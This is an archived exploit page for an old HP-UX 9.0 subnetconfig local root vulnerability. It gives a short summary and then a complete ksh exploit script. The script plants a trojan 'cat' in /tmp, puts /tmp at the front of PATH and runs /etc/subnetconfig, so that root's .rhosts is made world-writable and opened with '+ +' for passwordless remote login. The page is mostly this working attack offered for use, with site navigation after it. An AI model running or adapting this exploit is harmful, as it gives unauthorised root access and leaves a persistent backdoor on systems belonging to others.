Old HPUX subnetconfig vulnerability

Summary
Description:trojan in path vulnerability in subnetconfig
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable netconfig, possibly just 9.0
Date:OLD
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh
echo '#!/bin/ksh' > /tmp/cat
echo 'chmod 666 ~root/.rhosts' >> /tmp/cat
echo 'echo + + >> ~root/.rhosts' >> /tmp/cat
chmod 777 /tmp/cat
PATH=/tmp:$PATH
export PATH
/etc/subnetconfig
rm /tmp/cat

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]